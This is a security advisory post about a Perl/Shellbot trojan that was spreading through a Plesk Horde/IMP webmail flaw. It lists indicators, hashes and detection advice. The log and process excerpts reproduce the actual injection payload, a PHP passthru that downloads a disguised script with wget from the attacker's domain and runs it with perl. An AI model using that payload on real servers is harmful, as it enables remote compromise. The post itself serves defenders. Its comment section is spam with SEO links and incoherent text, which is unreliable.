Active Perl/Shellbot Trojan

Published: 2013-10-26
Last Updated: 2013-10-26 23:55:43 UTC
by Guy Bruneau (Version: 2)
2 comment(s)

ISC received a submission from Zach of a Perl/Shellbot.B trojan served by fallencrafts[.]info/download/himad.png[1]. The trojan has limited detection on Virustotal [2] and the script contains a “hostauth” of sosick[.]net[3] and the IRC server where the compromised systems are connecting to is located at 89.248.172.144. What we have so far, it appears it is exploiting older version of Plesk.

Update

This Bot exploit a vulnerability in Horde/IMP Plesk webmail, you might want to review system logs for signs of the server attempting to connect outbound to fallencrafts[.]info which appears to be exploiting a Plesk [4] vulnerability and maybe other to connect to 93.174.88.125 which a lot of activity has been reported to DShield for the past 3 days.

Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN 93.174.88.125 to localhost:143[imap/notls] as <?php passthru("cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*"); ?>@xxxxxxxxx.net [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]

If a system is compromised, you are likely going to see similar Apache processes:

apache   10760  0.0  0.0  10816  1084 ?        S    11:09   0:00 sh -c cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*
apache   10761  0.0  0.0  42320  1392 ?        S    11:09   0:00 wget http://fallencrafts.info/download/himad.png

md5: bca0b2a88338427ba2e8729e710122cd  himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9  himad.png

[1] https://dns.robtex.com/fallencrafts.info.html#graph
[2] https://www.virustotal.com/en/url/79654fc688b48211ccc24a14d815c41dba0b1dfbefc2c51d38ed88b481242e9b/analysis/1382747124/
[3] https://dns.robtex.com/sosick.net.html#records
[4] http://kb.parallels.com/en/113374
[5] http://kb.parallels.com/en/116241
[6] https://isc.sans.edu/ipdetails.html?ip=93.174.88.125

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

2 comment(s)

Comments

cwqwqwq
eweew<a href="https://www.seocheckin.com/edu-sites-list/">mashood</a>
WQwqwqwq[url=https://www.seocheckin.com/edu-sites-list/]mashood[/url]
dwqqqwqwq mashood
[https://isc.sans.edu/diary.html](https://isc.sans.edu/diary.html)
[https://isc.sans.edu/diary.html | https://isc.sans.edu/diary.html]
What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/

Diary Archives